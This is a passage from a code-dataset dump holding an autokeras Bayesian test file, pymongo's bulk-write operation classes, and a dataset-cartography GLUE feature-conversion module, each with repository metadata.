] | null | null | null | tests/test_bayesian.py | eric-erki/autokeras | d365a04af7f41641c4b0634fc076f6dbe2364d53 | [
"MIT"
] | 1 | 2018-10-11T03:43:41.000Z | 2018-10-11T03:43:41.000Z | from autokeras.bayesian import *
from tests.common import get_add_skip_model, get_concat_skip_model, get_conv_dense_model
def test_edit_distance():
descriptor1 = get_add_skip_model().extract_descriptor()
descriptor2 = get_concat_skip_model().extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 2.0
def test_edit_distance2():
descriptor1 = get_conv_dense_model().extract_descriptor()
graph = get_conv_dense_model()
graph.to_conv_deeper_model(1, 3)
graph.to_wider_model(5, 6)
graph.to_wider_model(17, 3)
descriptor2 = graph.extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 1.5
def test_bourgain_embedding():
assert bourgain_embedding_matrix([[0]]).shape == (1, 1)
assert bourgain_embedding_matrix([[1, 0], [0, 1]]).shape == (2, 2)
def test_gpr():
gpr = IncrementalGaussianProcess(1.0)
gpr.first_fit([get_add_skip_model().extract_descriptor()], [0.5])
assert gpr.first_fitted
gpr.incremental_fit([get_concat_skip_model().extract_descriptor()], [0.6])
assert abs(gpr.predict(np.array([get_add_skip_model().extract_descriptor()]))[0] - 0.5) < 1e-4
assert abs(gpr.predict(np.array([get_concat_skip_model().extract_descriptor()]))[0] - 0.6) < 1e-4
| 37.441176 | 101 | 0.732914 | from autokeras.bayesian import *
from tests.common import get_add_skip_model, get_concat_skip_model, get_conv_dense_model
def test_edit_distance():
descriptor1 = get_add_skip_model().extract_descriptor()
descriptor2 = get_concat_skip_model().extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 2.0
def test_edit_distance2():
descriptor1 = get_conv_dense_model().extract_descriptor()
graph = get_conv_dense_model()
graph.to_conv_deeper_model(1, 3)
graph.to_wider_model(5, 6)
graph.to_wider_model(17, 3)
descriptor2 = graph.extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 1.5
def test_bourgain_embedding():
assert bourgain_embedding_matrix([[0]]).shape == (1, 1)
assert bourgain_embedding_matrix([[1, 0], [0, 1]]).shape == (2, 2)
def test_gpr():
gpr = IncrementalGaussianProcess(1.0)
gpr.first_fit([get_add_skip_model().extract_descriptor()], [0.5])
assert gpr.first_fitted
gpr.incremental_fit([get_concat_skip_model().extract_descriptor()], [0.6])
assert abs(gpr.predict(np.array([get_add_skip_model().extract_descriptor()]))[0] - 0.5) < 1e-4
assert abs(gpr.predict(np.array([get_concat_skip_model().extract_descriptor()]))[0] - 0.6) < 1e-4
| true | true |
f72ef82aa0bb7f97b0195399046eb262d8c67ee3 | 17,244 | py | Python | pymongo/operations.py | james00209/mongodb-mongo-python-driver | bf6af9fd77bc13c0668018500071992e9e5ba05b | [
"Apache-2.0"
] | 1 | 2020-08-04T08:30:25.000Z | 2020-08-04T08:30:25.000Z | pymongo/operations.py | james00209/mongodb-mongo-python-driver | bf6af9fd77bc13c0668018500071992e9e5ba05b | [
"Apache-2.0"
] | null | null | null | pymongo/operations.py | james00209/mongodb-mongo-python-driver | bf6af9fd77bc13c0668018500071992e9e5ba05b | [
"Apache-2.0"
] | null | null | null | # Copyright 2015-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Operation class definitions."""
from bson.py3compat import string_type
from pymongo import helpers
from pymongo.common import validate_boolean, validate_is_mapping, validate_list
from pymongo.collation import validate_collation_or_none
from pymongo.helpers import _gen_index_name, _index_document, _index_list
class InsertOne(object):
"""Represents an insert_one operation."""
__slots__ = ("_doc",)
def __init__(self, document):
"""Create an InsertOne instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `document`: The document to insert. If the document is missing an
_id field one will be added.
"""
self._doc = document
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_insert(self._doc)
def __repr__(self):
return "InsertOne(%r)" % (self._doc,)
def __eq__(self, other):
if type(other) == type(self):
return other._doc == self._doc
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteOne(object):
"""Represents a delete_one operation."""
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
"""Create a DeleteOne instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.4 and above.
.. versionchanged:: 3.11
Added the ``hint`` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_delete(self._filter, 1, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteOne(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteMany(object):
"""Represents a delete_many operation."""
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
"""Create a DeleteMany instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.4 and above.
.. versionchanged:: 3.11
Added the ``hint`` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_delete(self._filter, 0, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteMany(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class ReplaceOne(object):
"""Represents a replace_one operation."""
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_hint")
def __init__(self, filter, replacement, upsert=False, collation=None,
hint=None):
"""Create a ReplaceOne instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.2 and above.
.. versionchanged:: 3.11
Added the ``hint`` option.
.. versionchanged:: 3.5
Added the ``collation`` option.
"""
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = replacement
self._upsert = upsert
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_replace(self._filter, self._doc, self._upsert,
collation=self._collation, hint=self._hint)
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._hint) == (self._filter, self._doc, self._upsert,
self._collation, other._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._hint)
class _UpdateOp(object):
"""Private base class for update operations."""
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_array_filters",
"_hint")
def __init__(self, filter, doc, upsert, collation, array_filters, hint):
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if array_filters is not None:
validate_list("array_filters", array_filters)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = doc
self._upsert = upsert
self._collation = collation
self._array_filters = array_filters
self._hint = hint
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._array_filters, other._hint) ==
(self._filter, self._doc, self._upsert, self._collation,
self._array_filters, self._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._array_filters, self._hint)
class UpdateOne(_UpdateOp):
"""Represents an update_one operation."""
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
"""Represents an update_one operation.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.2 and above.
.. versionchanged:: 3.11
Added the `hint` option.
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
super(UpdateOne, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_update(self._filter, self._doc, False, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class UpdateMany(_UpdateOp):
"""Represents an update_many operation."""
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
"""Create an UpdateMany instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.2 and above.
.. versionchanged:: 3.11
Added the `hint` option.
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
super(UpdateMany, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_update(self._filter, self._doc, True, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class IndexModel(object):
"""Represents an index to create."""
__slots__ = ("__document",)
def __init__(self, keys, **kwargs):
"""Create an Index instance.
For use with :meth:`~pymongo.collection.Collection.create_indexes`.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index. Requires server version >= 3.2.
- `collation`: An instance of :class:`~pymongo.collation.Collation`
that specifies the collation to use in MongoDB >= 3.4.
- `wildcardProjection`: Allows users to include or exclude specific
field paths from a `wildcard index`_ using the { "$**" : 1} key
pattern. Requires server version >= 4.2.
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. _wildcard index: https://docs.mongodb.com/master/core/index-wildcard/#wildcard-index-core
"""
keys = _index_list(keys)
if "name" not in kwargs:
kwargs["name"] = _gen_index_name(keys)
kwargs["key"] = _index_document(keys)
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__document = kwargs
if collation is not None:
self.__document['collation'] = collation
@property
def document(self):
"""An index document suitable for passing to the createIndexes
command.
"""
return self.__document
| 38.577181 | 100 | 0.603978 |
from bson.py3compat import string_type
from pymongo import helpers
from pymongo.common import validate_boolean, validate_is_mapping, validate_list
from pymongo.collation import validate_collation_or_none
from pymongo.helpers import _gen_index_name, _index_document, _index_list
class InsertOne(object):
__slots__ = ("_doc",)
def __init__(self, document):
self._doc = document
def _add_to_bulk(self, bulkobj):
bulkobj.add_insert(self._doc)
def __repr__(self):
return "InsertOne(%r)" % (self._doc,)
def __eq__(self, other):
if type(other) == type(self):
return other._doc == self._doc
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteOne(object):
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
bulkobj.add_delete(self._filter, 1, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteOne(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteMany(object):
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
bulkobj.add_delete(self._filter, 0, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteMany(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class ReplaceOne(object):
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_hint")
def __init__(self, filter, replacement, upsert=False, collation=None,
hint=None):
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = replacement
self._upsert = upsert
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
bulkobj.add_replace(self._filter, self._doc, self._upsert,
collation=self._collation, hint=self._hint)
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._hint) == (self._filter, self._doc, self._upsert,
self._collation, other._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._hint)
class _UpdateOp(object):
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_array_filters",
"_hint")
def __init__(self, filter, doc, upsert, collation, array_filters, hint):
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if array_filters is not None:
validate_list("array_filters", array_filters)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = doc
self._upsert = upsert
self._collation = collation
self._array_filters = array_filters
self._hint = hint
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._array_filters, other._hint) ==
(self._filter, self._doc, self._upsert, self._collation,
self._array_filters, self._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._array_filters, self._hint)
class UpdateOne(_UpdateOp):
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
super(UpdateOne, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
bulkobj.add_update(self._filter, self._doc, False, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class UpdateMany(_UpdateOp):
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
super(UpdateMany, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
bulkobj.add_update(self._filter, self._doc, True, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class IndexModel(object):
__slots__ = ("__document",)
def __init__(self, keys, **kwargs):
keys = _index_list(keys)
if "name" not in kwargs:
kwargs["name"] = _gen_index_name(keys)
kwargs["key"] = _index_document(keys)
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__document = kwargs
if collation is not None:
self.__document['collation'] = collation
@property
def document(self):
return self.__document
| true | true |
f72ef8d492f94e15b347ad4d22bde114fd4df114 | 9,789 | py | Python | cartography/classification/glue_utils.py | dyahadila/ood_cartography | ff65bf2b1a170e2913f0019a15af3398a1808f0f | [
"Apache-2.0"
] | null | null | null | cartography/classification/glue_utils.py | dyahadila/ood_cartography | ff65bf2b1a170e2913f0019a15af3398a1808f0f | [
"Apache-2.0"
] | null | null | null | cartography/classification/glue_utils.py | dyahadila/ood_cartography | ff65bf2b1a170e2913f0019a15af3398a1808f0f | [
"Apache-2.0"
] | null | null | null | import logging
import os
from transformers import glue_compute_metrics
from transformers import glue_convert_examples_to_features as convert_examples_to_features
from transformers import glue_output_modes
from transformers import glue_processors
from transformers.data.processors.glue import MnliMismatchedProcessor
from transformers.data.processors.utils import InputFeatures
from transformers.file_utils import is_tf_available
if is_tf_available():
import tensorflow as tf
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
from cartography.data_utils_glue import convert_string_to_unique_number
from cartography.classification.mnli_utils import AdaptedMnliMismatchedProcessor, AdaptedMnliProcessor
from cartography.classification.qnli_utils import AdaptedQnliProcessor
from cartography.classification.snli_utils import SNLIProcessor
from cartography.classification.winogrande_utils import WinograndeProcessor
from cartography.classification.wnli_utils import AdaptedWnliProcessor
from cartography.classification.rte_utils import AdaptedRteProcessor
import pandas as pd
glue_processors["snli"] = SNLIProcessor
glue_processors["mnli"] = AdaptedMnliProcessor
glue_processors["mnli-mm"] = AdaptedMnliMismatchedProcessor
glue_processors["qnli"] = AdaptedQnliProcessor
glue_processors["winogrande"] = WinograndeProcessor
glue_processors["wnli"] = AdaptedWnliProcessor
glue_processors["rte"] = AdaptedRteProcessor
glue_output_modes["snli"] = "classification"
glue_output_modes["winogrande"] = "classification"
class AdaptedInputFeatures(InputFeatures):
def __init__(self, input_ids, attention_mask=None, token_type_ids=None, label=None, example_id=None, lex = None,
const=None, subs=None, original_idx=None):
self.input_ids = input_ids
self.attention_mask = attention_mask
self.token_type_ids = token_type_ids
self.label = label
self.example_id = example_id
self.lex = lex
self.const = const
self.subs = subs
self.original_idx = original_idx
def get_instance_heuristics(task, data_split):
mode = data_split
### UNCOMMENT FOR MNLI
if 'dev' in data_split:
mode = 'dev'
if task.upper() == 'MNLI':
mode = 'dev_matched'
df = pd.read_csv("/home/jusun/adila001/{}/{}_heuristic.tsv".format(task.upper(), mode), delimiter="\t|\n")
lexical = df["lexical"].tolist()
if 'constituent' in set(df.columns):
constituent = df["constituent"].tolist()
else:
constituent = [0 for i in range(df.shape[0])]
subsequence = df["subsequence"].tolist()
return lexical, constituent, subsequence
def adapted_glue_convert_examples_to_features(
examples,
tokenizer,
max_length=512,
task=None,
label_list=None,
output_mode=None,
pad_on_left=False,
pad_token=0,
pad_token_segment_id=0,
mask_padding_with_zero=True,
heuristics=True,
data_split='train',
):
"""
Adapted from `transformers`. New functionality: also return an integer ID for each example.
Loads a data file into a list of ``InputFeatures``
Args:
examples: List of ``InputExamples`` or ``tf.data.Dataset`` containing the examples.
tokenizer: Instance of a tokenizer that will tokenize the examples
max_length: Maximum example length
task: GLUE task
label_list: List of labels. Can be obtained from the processor using the ``processor.get_labels()`` method
output_mode: String indicating the output mode. Either ``regression`` or ``classification``
pad_on_left: If set to ``True``, the examples will be padded on the left rather than on the right (default)
pad_token: Padding token
pad_token_segment_id: The segment ID for the padding token (It is usually 0, but can vary such as for XLNet where it is 4)
mask_padding_with_zero: If set to ``True``, the attention mask will be filled by ``1`` for actual values
and by ``0`` for padded values. If set to ``False``, inverts it (``1`` for padded values, ``0`` for
actual values)
Returns:
If the ``examples`` input is a ``tf.data.Dataset``, will return a ``tf.data.Dataset``
containing the task-specific features. If the input is a list of ``InputExamples``, will return
a list of task-specific ``InputFeatures`` which can be fed to the model.
"""
is_tf_dataset = False
if is_tf_available() and isinstance(examples, tf.data.Dataset):
is_tf_dataset = True
if task is not None:
processor = glue_processors[task]()
if label_list is None:
label_list = processor.get_labels()
logger.info("Using label list %s for task %s" % (label_list, task))
if output_mode is None:
output_mode = glue_output_modes[task]
logger.info("Using output mode %s for task %s" % (output_mode, task))
label_map = {label: i for i, label in enumerate(label_list)}
features = []
lex = []
const= []
subs = []
if heuristics==True:
lex, const, subs = get_instance_heuristics(task, data_split)
for (ex_index, example) in enumerate(examples):
len_examples = 0
if is_tf_dataset:
example = processor.get_example_from_tensor_dict(example)
example = processor.tfds_map(example)
len_examples = tf.data.experimental.cardinality(examples)
else:
len_examples = len(examples)
if ex_index % 10000 == 0:
logger.info("Writing example %d/%d" % (ex_index, len_examples))
inputs = tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length,)
input_ids, token_type_ids = inputs["input_ids"], inputs["token_type_ids"]
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)
# Zero-pad up to the sequence length.
padding_length = max_length - len(input_ids)
if pad_on_left:
input_ids = ([pad_token] * padding_length) + input_ids
attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask
token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids
else:
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0 if mask_padding_with_zero else 1] * padding_length)
token_type_ids = token_type_ids + ([pad_token_segment_id] * padding_length)
assert len(input_ids) == max_length, "Error with input length {} vs {}".format(len(input_ids), max_length)
assert len(attention_mask) == max_length, "Error with input length {} vs {}".format(
len(attention_mask), max_length
)
assert len(token_type_ids) == max_length, "Error with input length {} vs {}".format(
len(token_type_ids), max_length
)
if output_mode == "classification":
label = label_map[example.label]
elif output_mode == "regression":
label = float(example.label)
else:
raise KeyError(output_mode)
example_int_id = convert_string_to_unique_number(example.guid)
if ex_index < 5:
logger.info("*** Example ***")
logger.info(f"guid: {example_int_id}")
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("attention_mask: %s" % " ".join([str(x) for x in attention_mask]))
logger.info("token_type_ids: %s" % " ".join([str(x) for x in token_type_ids]))
logger.info("label: %s (id = %d)" % (example.label, label))
features.append(
AdaptedInputFeatures(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
label=label,
example_id=example_int_id,
lex=None if len(lex)==0 else lex[ex_index],
const=None if len(const)==0 else const[ex_index],
subs=None if len(const)==0else subs[ex_index],
original_idx=ex_index))
if is_tf_available() and is_tf_dataset:
def gen():
for ex in features:
yield (
{
"input_ids": ex.input_ids,
"attention_mask": ex.attention_mask,
"token_type_ids": ex.token_type_ids,
},
ex.label,
)
return tf.data.Dataset.from_generator(
gen,
({"input_ids": tf.int32, "attention_mask": tf.int32, "token_type_ids": tf.int32}, tf.int64),
(
{
"input_ids": tf.TensorShape([None]),
"attention_mask": tf.TensorShape([None]),
"token_type_ids": tf.TensorShape([None]),
},
tf.TensorShape([]),
),
)
return features
def adapted_glue_compute_metrics(task_name, preds, labels):
"Adapted from `glue_compute_metrics` to also handle SNLI."
try:
return glue_compute_metrics(task_name, preds, labels)
except KeyError:
if task_name in ["snli", "winogrande", "toxic"]:
# Since MNLI also uses accuracy.
return glue_compute_metrics("mnli", preds, labels)
raise KeyError(task_name)
| 41.478814 | 130 | 0.647053 | import logging
import os
from transformers import glue_compute_metrics
from transformers import glue_convert_examples_to_features as convert_examples_to_features
from transformers import glue_output_modes
from transformers import glue_processors
from transformers.data.processors.glue import MnliMismatchedProcessor
from transformers.data.processors.utils import InputFeatures
from transformers.file_utils import is_tf_available
if is_tf_available():
import tensorflow as tf
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
from cartography.data_utils_glue import convert_string_to_unique_number
from cartography.classification.mnli_utils import AdaptedMnliMismatchedProcessor, AdaptedMnliProcessor
from cartography.classification.qnli_utils import AdaptedQnliProcessor
from cartography.classification.snli_utils import SNLIProcessor
from cartography.classification.winogrande_utils import WinograndeProcessor
from cartography.classification.wnli_utils import AdaptedWnliProcessor
from cartography.classification.rte_utils import AdaptedRteProcessor
import pandas as pd
# Register task processors in transformers' GLUE registry, adding SNLI and
# Winogrande and overriding several stock processors with adapted variants.
glue_processors["snli"] = SNLIProcessor
glue_processors["mnli"] = AdaptedMnliProcessor
glue_processors["mnli-mm"] = AdaptedMnliMismatchedProcessor
glue_processors["qnli"] = AdaptedQnliProcessor
glue_processors["winogrande"] = WinograndeProcessor
glue_processors["wnli"] = AdaptedWnliProcessor
glue_processors["rte"] = AdaptedRteProcessor
# Both newly added tasks are classification problems.
glue_output_modes["snli"] = "classification"
glue_output_modes["winogrande"] = "classification"
class AdaptedInputFeatures(InputFeatures):
    """``InputFeatures`` extended with cartography bookkeeping fields.

    On top of the standard transformer inputs it stores a unique integer
    ``example_id``, the example's ``original_idx`` within its dataset, and
    optional per-example heuristic scores (``lex``, ``const``, ``subs``).
    """

    def __init__(self, input_ids, attention_mask=None, token_type_ids=None, label=None, example_id=None, lex=None,
                 const=None, subs=None, original_idx=None):
        # Standard model inputs (mirrors transformers.InputFeatures).
        self.input_ids = input_ids
        self.attention_mask = attention_mask
        self.token_type_ids = token_type_ids
        self.label = label
        # Extra per-example bookkeeping for cartography/heuristic analysis.
        self.example_id = example_id
        self.original_idx = original_idx
        self.lex = lex
        self.const = const
        self.subs = subs
def get_instance_heuristics(task, data_split, base_dir="/home/jusun/adila001"):
    """Load per-example heuristic scores for a task split from disk.

    Reads ``{base_dir}/{TASK}/{mode}_heuristic.tsv`` and returns the three
    score columns as plain lists.

    Args:
        task: task name; uppercased to form the directory name. For MNLI the
            file is always the one named after the matched dev split
            ("dev_matched"), regardless of ``data_split`` (original behavior).
        data_split: split name used to pick the heuristic file.
        base_dir: root directory holding the per-task heuristic files.
            Parameterized for testability; defaults to the original
            hard-coded path, so existing callers are unaffected.

    Returns:
        Tuple ``(lexical, constituent, subsequence)`` of equal-length lists.
        Tasks whose file lacks a ``constituent`` column get a list of zeros.
    """
    mode = data_split
    if task.upper() == 'MNLI':
        mode = 'dev_matched'
    path = os.path.join(base_dir, task.upper(), "{}_heuristic.tsv".format(mode))
    # NOTE: a multi-char delimiter is treated as a regex by pandas and forces
    # the (slower) python parsing engine; kept for byte-compatible parsing.
    df = pd.read_csv(path, delimiter="\t|\n")
    lexical = df["lexical"].tolist()
    if 'constituent' in df.columns:
        constituent = df["constituent"].tolist()
    else:
        # Some tasks ship no constituent scores; substitute zeros.
        constituent = [0] * df.shape[0]
    subsequence = df["subsequence"].tolist()
    return lexical, constituent, subsequence
def adapted_glue_convert_examples_to_features(
    examples,
    tokenizer,
    max_length=512,
    task=None,
    label_list=None,
    output_mode=None,
    pad_on_left=False,
    pad_token=0,
